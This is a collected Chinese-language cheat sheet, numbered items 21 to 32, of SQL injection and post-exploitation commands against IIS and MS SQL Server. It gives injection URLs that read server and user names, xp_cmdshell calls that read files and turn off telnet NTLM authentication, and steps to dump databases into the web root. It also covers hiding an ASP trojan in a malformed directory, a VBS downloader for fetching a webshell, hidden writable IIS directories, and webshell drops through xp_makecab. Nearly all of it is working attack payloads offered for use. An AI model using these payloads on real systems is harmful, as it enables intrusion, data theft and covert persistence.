最全的SQL注入命令及方法-网络收集<br />
用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:\website\www <br />
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后C、D、E盘的目录树分别存到temp、temp1、temp2中。<br />
下载完数据库后要记得把三个临时表drop掉,现在我们在下载的数据库中可以找到所有的目录列表,包括后台管理的目录以及更多信息。<br />
21、win2000下将WEB用户提升为系统用户权限,需要有管理员的权限才能执行:<br />
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"<br />
cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"<br />
查看是否成功:<br />
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps<br />
Microsoft (R) Windows Script Host Version 5.6<br />
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。<br />
inprocessisapiapps : (LIST) (6 Items)<br />
"C:\WINNT\system32\idq.dll"<br />
"C:\WINNT\system32\inetsrv\httpext.dll"<br />
"C:\WINNT\system32\inetsrv\httpodbc.dll"<br />
"C:\WINNT\system32\inetsrv\ssinc.dll"<br />
"C:\WINNT\system32\msw3prt.dll"<br />
"c:\winnt\system32\inetsrv\asp.dll"<br />
22、如何隐藏ASP木马:<br />
建立非标准目录:mkdir images..\<br />
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp<br />
通过web访问ASP木马:http://ip/images../news.asp?action=login<br />
如何删除非标准目录:rmdir images..\ /s<br />
23、去掉tenlnet的ntlm认证:<br />
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'?<br />
24、用echo写入文件下载脚本iget.vbs:<br />
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs<br />
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp<br />
<br />
25、手工建立IIS隐藏目录的方法:<br />
? 查看本地虚拟目录列表:cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root <br />
? 新建一个kiss目录:mkdir c:\asp\kiss <br />
? 建立kiss虚拟目录:cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss" <br />
? 为kiss目录加执行和写权限:<br />
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s: <br />
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:<br />
? ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false<br />
? 访问:http://127.0.0.1/kiss/test.asp<br />
26、使用openrowset()连回本地做测试:<br />
select a.*<br />
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',<br />
'select * FROM [dvbbs].[dbo].[dv_admin]') AS a<br />
select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',<br />
'select * FROM [dvbbs].[dbo].[dv_admin]')<br />
27、获得主机名:<br />
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--<br />
select convert(int,@@servername)<br />
select @@servername<br />
28、获得数据库用户名:<br />
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--<br />
http://www.19cn.com/showdetail.asp?id=49 and user>0<br />
select user<br />
29、普通用户获得WEBSHELL的方法之二:<br />
? 打包:<br />
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'<br />
解包,可以用于得到webshell:<br />
? EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'<br />
? 读任意文件内容,要求有master的dbo权限:<br />
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'<br />
30、sa 权限下已知web路径直接备份数据库到web路径下<br />
http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。<br />
? 遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:temp<br />
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--<br />
? 接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:<br />
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--<br />
? 我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:<br />
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--<br />
? 我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:<br />
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 这样就可以成功的浏览到所有的目录(文件夹)列表<br />
? 如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--<br />
? 使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp' 浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。<br />
31、一些sql中的扩展存储的总结:<br />
xp_availablemedia 显示系统上可用的盘符'C:\' xp_availablemedia <br />
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups <br />
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn <br />
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'C:\inetpub\wwwroot\' <br />
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'C:\inetpub\wwwroot.asp' <br />
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp' <br />
xp_unpackcab 解压缩 xp_unpackcab 'C:\hackway.cab','C:\temp',1 <br />
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains <br />
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule' <br />
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123 <br />
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'C:\'<br />
32、<br />
USE MASTER<br />
GO<br />
create proc sp_MSforeachObject<br />
@objectType int=1,<br />
@command1 nvarchar(2000),<br />
@replacechar nchar(1) = N'?',<br />
@command2 nvarchar(2000) = null,<br />
@command3 nvarchar(2000) = null,<br />
@whereand nvarchar(2000) = null,<br />
@precommand nvarchar(2000) = null,<br />
@postcommand nvarchar(2000) = null<br />
as<br />
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its <br />
own result set */<br />
/* @precommand and @postcommand may be used to force a single result set via a temp table. */<br />
/* Preprocessor won't replace within quotes so have to use str(). */<br />
declare @mscat nvarchar(12)<br />
select @mscat = ltrim(str(convert(int, 0x0002)))<br />
if (@precommand is not null)<br />
exec(@precommand)<br />
/* Defined @isobject for save object type */<br />
Declare @isobject varchar(256)<br />
select @isobject= case @objectType when 1 then 'IsUserTable'<br />
when 2 then 'IsView'<br />
when 3 then 'IsTrigger'<br />
when 4 then 'IsProcedure'<br />
when 5 then 'IsDefault'<br />
when 6 then 'IsForeignKey'<br />
when 7 then 'IsScalarFunction'<br />
when 8 then 'IsInlineFunction'<br />
when 9 then 'IsPrimaryKey'<br />
when 10 then 'IsExtendedProc'<br />
when 11 then 'IsReplProc'<br />
when 12 then 'IsRule'<br />
end<br />
/* create the select */<br />
/* Use @isobject variable isstead of IsUserTable string */<br />
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' + <br />
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '<br />
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '<br />
+ @whereand)<br />
declare @retval int<br />
select @retval = @@error<br />
if (@retval = 0)<br />
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3<br />
if (@retval = 0 and @postcommand is not null)<br />
exec(@postcommand)<br />
return @retval<br />
GO<br />
<br />
<br />
<br />